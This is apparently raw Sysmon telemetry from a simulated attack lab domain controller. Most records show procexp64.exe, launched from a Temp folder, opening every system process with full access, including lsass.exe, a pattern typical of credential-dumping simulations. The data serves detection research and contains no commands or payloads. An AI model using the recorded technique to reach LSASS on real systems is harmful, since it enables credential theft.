15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790873Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790872Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790871Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790870Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790869Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790868Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790867Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790866Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790865Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790864Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790863Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790862Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790861Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790860Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790859Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790858Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790857Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790856Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790855Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790854Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790853Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790852Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790851Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790850Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:49.532{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790993Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.939{732C744F-3262-6010-D9A2-00000000A301}45244156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790992Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.798{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3262-6010-D9A2-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790991Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.782{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790990Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.782{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790989Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.782{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790988Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.782{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790987Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.782{732C744F-1517-600B-0500-00000000A301}6402204C:\Windows\system32\csrss.exe{732C744F-3262-6010-D9A2-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000790986Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.782{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3262-6010-D9A2-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000790985Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.783{732C744F-3262-6010-D9A2-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000790984Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:50.563{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790983Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 